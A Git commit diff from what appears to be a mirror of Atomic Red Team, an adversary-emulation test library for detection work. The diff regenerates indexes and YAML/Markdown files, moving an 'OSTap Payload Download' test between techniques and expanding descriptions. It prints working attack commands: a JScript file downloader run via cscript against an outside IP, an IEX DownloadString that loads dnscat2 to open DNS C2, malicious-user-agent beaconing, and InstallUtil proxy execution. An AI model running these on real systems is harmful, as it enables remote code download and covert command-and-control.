security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-04-22 16:23:59 +00:00
parent 4a8ec3b1c7
commit ceafbf9c62
8 changed files with 174 additions and 150 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Indexes-CSV/index.csv
+3 -3
View File
@@ -534,8 +534,9 @@ execution,T1151,Space after Filename,1,Space After Filename
execution,T1154,Trap,1,Trap
execution,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
execution,T1204,User Execution,1,OSTap Style Macro Execution
execution,T1204,User Execution,2,Maldoc choice flags command execution
execution,T1204,User Execution,3,OSTAP JS version
execution,T1204,User Execution,2,OSTap Payload Download
execution,T1204,User Execution,3,Maldoc choice flags command execution
execution,T1204,User Execution,4,OSTAP JS version
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
@@ -637,7 +638,6 @@ command-and-control,T1071,Standard Application Layer Protocol,4,DNS Large Query
command-and-control,T1071,Standard Application Layer Protocol,5,DNS Regular Beaconing
command-and-control,T1071,Standard Application Layer Protocol,6,DNS Long Domain Query
command-and-control,T1071,Standard Application Layer Protocol,7,DNS C2
command-and-control,T1071,Standard Application Layer Protocol,8,OSTap Payload Download
command-and-control,T1032,Standard Cryptographic Protocol,1,OpenSSL C2
command-and-control,T1095,Standard Non-Application Layer Protocol,1,ICMP C2
command-and-control,T1095,Standard Non-Application Layer Protocol,2,Netcat C2
1 Tactic Technique # Technique Name Test # Test Name
534 execution T1154 Trap 1 Trap
535 execution T1127 Trusted Developer Utilities 1 MSBuild Bypass Using Inline Tasks
536 execution T1204 User Execution 1 OSTap Style Macro Execution
537 execution T1204 User Execution 2 Maldoc choice flags command execution OSTap Payload Download
538 execution T1204 User Execution 3 OSTAP JS version Maldoc choice flags command execution
539 execution T1204 User Execution 4 OSTAP JS version
540 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users
541 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes
542 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software
638 command-and-control T1071 Standard Application Layer Protocol 5 DNS Regular Beaconing
639 command-and-control T1071 Standard Application Layer Protocol 6 DNS Long Domain Query
640 command-and-control T1071 Standard Application Layer Protocol 7 DNS C2
command-and-control T1071 Standard Application Layer Protocol 8 OSTap Payload Download
641 command-and-control T1032 Standard Cryptographic Protocol 1 OpenSSL C2
642 command-and-control T1095 Standard Non-Application Layer Protocol 1 ICMP C2
643 command-and-control T1095 Standard Non-Application Layer Protocol 2 Netcat C2
atomics/Indexes/Indexes-CSV/windows-index.csv
+3 -3
View File
@@ -410,8 +410,9 @@ execution,T1216,Signed Script Proxy Execution,2,SyncAppvPublishingServer Signed
execution,T1216,Signed Script Proxy Execution,3,manage-bde.wsf Signed Script Command Execution
execution,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
execution,T1204,User Execution,1,OSTap Style Macro Execution
execution,T1204,User Execution,2,Maldoc choice flags command execution
execution,T1204,User Execution,3,OSTAP JS version
execution,T1204,User Execution,2,OSTap Payload Download
execution,T1204,User Execution,3,Maldoc choice flags command execution
execution,T1204,User Execution,4,OSTAP JS version
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
@@ -440,7 +441,6 @@ command-and-control,T1071,Standard Application Layer Protocol,4,DNS Large Query
command-and-control,T1071,Standard Application Layer Protocol,5,DNS Regular Beaconing
command-and-control,T1071,Standard Application Layer Protocol,6,DNS Long Domain Query
command-and-control,T1071,Standard Application Layer Protocol,7,DNS C2
command-and-control,T1071,Standard Application Layer Protocol,8,OSTap Payload Download
command-and-control,T1032,Standard Cryptographic Protocol,1,OpenSSL C2
command-and-control,T1095,Standard Non-Application Layer Protocol,1,ICMP C2
command-and-control,T1095,Standard Non-Application Layer Protocol,2,Netcat C2
1 Tactic Technique # Technique Name Test # Test Name
410 execution T1216 Signed Script Proxy Execution 3 manage-bde.wsf Signed Script Command Execution
411 execution T1127 Trusted Developer Utilities 1 MSBuild Bypass Using Inline Tasks
412 execution T1204 User Execution 1 OSTap Style Macro Execution
413 execution T1204 User Execution 2 Maldoc choice flags command execution OSTap Payload Download
414 execution T1204 User Execution 3 OSTAP JS version Maldoc choice flags command execution
415 execution T1204 User Execution 4 OSTAP JS version
416 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users
417 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes
418 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software
441 command-and-control T1071 Standard Application Layer Protocol 5 DNS Regular Beaconing
442 command-and-control T1071 Standard Application Layer Protocol 6 DNS Long Domain Query
443 command-and-control T1071 Standard Application Layer Protocol 7 DNS C2
command-and-control T1071 Standard Application Layer Protocol 8 OSTap Payload Download
444 command-and-control T1032 Standard Cryptographic Protocol 1 OpenSSL C2
445 command-and-control T1095 Standard Non-Application Layer Protocol 1 ICMP C2
446 command-and-control T1095 Standard Non-Application Layer Protocol 2 Netcat C2
atomics/Indexes/Indexes-Markdown/index.md
+3 -3
View File
@@ -810,8 +810,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- [T1204 User Execution](../../T1204/T1204.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: Maldoc choice flags command execution [windows]
- Atomic Test #3: OSTAP JS version [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -986,7 +987,6 @@
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- Atomic Test #7: DNS C2 [windows]
- Atomic Test #8: OSTap Payload Download [windows]
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
atomics/Indexes/Indexes-Markdown/windows-index.md
+3 -3
View File
@@ -676,8 +676,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- [T1204 User Execution](../../T1204/T1204.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: Maldoc choice flags command execution [windows]
- Atomic Test #3: OSTAP JS version [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -728,7 +729,6 @@
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- Atomic Test #7: DNS C2 [windows]
- Atomic Test #8: OSTap Payload Download [windows]
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
atomics/Indexes/index.yaml
+91 -79
View File
@@ -9143,10 +9143,9 @@ defense-evasion:
identifier: T1118
atomic_tests:
- name: CheckIfInstallable method call
description: 'Executes the CheckIfInstallable class constructor runner instead
of executing InstallUtil.
'
description: |
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -9208,10 +9207,9 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallHelper method call
description: 'Executes the InstallHelper class constructor runner instead of
executing InstallUtil.
'
description: |
Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -9275,7 +9273,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil class constructor method call
description: 'Executes the installer assembly class constructor.
description: 'Executes the installer assembly class constructor. Upon execution,
version information will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9341,7 +9340,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Install method call
description: 'Executes the Install Method
description: 'Executes the Install Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9407,7 +9407,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - /U variant
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9474,7 +9475,8 @@ defense-evasion:
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9540,7 +9542,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil HelpText method call
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, help information
will be displayed for InstallUtil.
'
supported_platforms:
@@ -9606,10 +9609,9 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil evasive invocation
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
using a nonstandard extension for the assembly.
'
description: |
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
@@ -22380,10 +22382,9 @@ execution:
identifier: T1118
atomic_tests:
- name: CheckIfInstallable method call
description: 'Executes the CheckIfInstallable class constructor runner instead
of executing InstallUtil.
'
description: |
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -22445,10 +22446,9 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallHelper method call
description: 'Executes the InstallHelper class constructor runner instead of
executing InstallUtil.
'
description: |
Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -22512,7 +22512,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil class constructor method call
description: 'Executes the installer assembly class constructor.
description: 'Executes the installer assembly class constructor. Upon execution,
version information will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22578,7 +22579,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Install method call
description: 'Executes the Install Method
description: 'Executes the Install Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22644,7 +22646,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - /U variant
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22711,7 +22714,8 @@ execution:
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22777,7 +22781,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil HelpText method call
description: 'Executes the Uninstall Method
description: 'Executes the Uninstall Method. Upon execution, help information
will be displayed for InstallUtil.
'
supported_platforms:
@@ -22843,10 +22848,9 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil evasive invocation
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
using a nonstandard extension for the assembly.
'
description: |
Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
@@ -25322,12 +25326,13 @@ execution:
identifier: T1204
atomic_tests:
- name: OSTap Style Macro Execution
description: "This Test uses a VBA macro to create and execute #{jse_path} with
cscript.exe. The .jse file in turn launches wscript.exe.\nExecution is handled
by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
to load and execute VBA code into Excel or Word documents.\n\nThis is a known
execution chain observed by the OSTap downloader commonly used in TrickBot
campaigns \nReferences:\n https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader\n"
description: |
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
References:
https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
supported_platforms:
- windows
input_arguments:
@@ -25364,6 +25369,30 @@ execution:
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
- name: OSTap Payload Download
description: 'Uses cscript //E:jscript to download a file
'
supported_platforms:
- windows
input_arguments:
script_file:
description: File to execute jscript code from
type: Path
default: "%TEMP%\\OSTapGet.js"
file_url:
description: URL to retrieve file from
type: Url
default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
executor:
name: command_prompt
elevation_required: false
command: |
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
'
- name: Maldoc choice flags command execution
description: |
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
@@ -25400,9 +25429,9 @@ execution:
'
- name: OSTAP JS version
description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
\nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
to load and execute VBA code into Excel or Word documents.\n"
description: |
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
input_arguments:
@@ -29425,9 +29454,10 @@ command-and-control:
identifier: T1071
atomic_tests:
- name: Malicious User Agents - Powershell
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
description: "This test simulates an infected host beaconing to command and
control. Upon execution, no output will be displayed. \nUse an application
such as Wireshark to record the session and observe user agent strings and
responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n"
supported_platforms:
- windows
input_arguments:
@@ -29444,9 +29474,10 @@ command-and-control:
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
- name: Malicious User Agents - CMD
description: |
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
description: "This test simulates an infected host beaconing to command and
control. Upon execution, no out put will be displayed. \nUse an application
such as Wireshark to record the session and observe user agent strings and
responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n"
supported_platforms:
- windows
input_arguments:
@@ -29457,10 +29488,10 @@ command-and-control:
executor:
name: command_prompt
command: |
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
- name: Malicious User Agents - Nix
description: |
This test simulates an infected host beaconing to command and control.
@@ -29484,6 +29515,7 @@ command-and-control:
description: |
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29515,6 +29547,7 @@ command-and-control:
description: |
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29547,12 +29580,13 @@ command-and-control:
name: powershell
elevation_required: false
command: |
Set-Location $PathToAtomicsFolder
Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
- name: DNS Long Domain Query
description: |
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29573,13 +29607,15 @@ command-and-control:
name: powershell
elevation_required: false
command: |
Set-Location $PathToAtomicsFolder
Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
- name: DNS C2
description: |
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
supported_platforms:
- windows
@@ -29599,30 +29635,6 @@ command-and-control:
command: |
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
- name: OSTap Payload Download
description: 'Uses cscript //E:jscript to download a file
'
supported_platforms:
- windows
input_arguments:
script_file:
description: File to execute jscript code from
type: Path
default: "%TEMP%\\OSTapGet.js"
file_url:
description: URL to retrieve file from
type: Url
default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
executor:
name: command_prompt
elevation_required: false
command: |
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
'
T1032:
technique:
x_mitre_data_sources:
atomics/T1071/T1071.md
+17 -45
View File
@@ -20,13 +20,13 @@ For connections that occur internally within an enclave (such as those between a
- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2)
- [Atomic Test #8 - OSTap Payload Download](#atomic-test-8---ostap-payload-download)
<br/>
## Atomic Test #1 - Malicious User Agents - Powershell
This test simulates an infected host beaconing to command and control.
This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
@@ -59,7 +59,9 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
<br/>
## Atomic Test #2 - Malicious User Agents - CMD
This test simulates an infected host beaconing to command and control.
This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed.
Use an application such as Wireshark to record the session and observe user agent strings and responses.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
@@ -77,10 +79,10 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
```cmd
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
curl -s -A "*<|>*" -m3 #{domain}
curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
```
@@ -127,6 +129,7 @@ curl -s -A "*<|>*" -m3 #{domain}
## Atomic Test #4 - DNS Large Query Volume
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -160,6 +163,7 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #5 - DNS Regular Beaconing
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -181,7 +185,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
```powershell
Set-Location $PathToAtomicsFolder
Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
@@ -196,6 +200,7 @@ Set-Location $PathToAtomicsFolder
## Atomic Test #6 - DNS Long Domain Query
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -214,7 +219,7 @@ The simulation involves sending DNS queries that gradually increase in length un
```powershell
Set-Location $PathToAtomicsFolder
Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
@@ -229,7 +234,9 @@ Set-Location $PathToAtomicsFolder
## Atomic Test #7 - DNS C2
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** Windows
@@ -257,39 +264,4 @@ Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
<br/>
<br/>
## Atomic Test #8 - OSTap Payload Download
Uses cscript //E:jscript to download a file
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_file | File to execute jscript code from | Path | %TEMP%&#92;OSTapGet.js|
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
#### Attack Commands: Run with `command_prompt`!
```cmd
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands:
```cmd
del #{script_file} /F /Q >nul 2>&1
```
<br/>
atomics/T1118/T1118.md
+11 -8
View File
@@ -26,7 +26,8 @@ Adversaries may use InstallUtil to proxy execution of code through a trusted Win
<br/>
## Atomic Test #1 - CheckIfInstallable method call
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil.
Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
If no output is displayed the test executed successfuly.
**Supported Platforms:** Windows
@@ -101,7 +102,8 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - InstallHelper method call
Executes the InstallHelper class constructor runner instead of executing InstallUtil.
Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
executed successfuly.
**Supported Platforms:** Windows
@@ -178,7 +180,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #3 - InstallUtil class constructor method call
Executes the installer assembly class constructor.
Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -255,7 +257,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #4 - InstallUtil Install method call
Executes the Install Method
Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -332,7 +334,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant
Executes the Uninstall Method
Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -409,7 +411,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant
Executes the Uninstall Method
Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -486,7 +488,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #7 - InstallUtil HelpText method call
Executes the Uninstall Method
Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil.
**Supported Platforms:** Windows
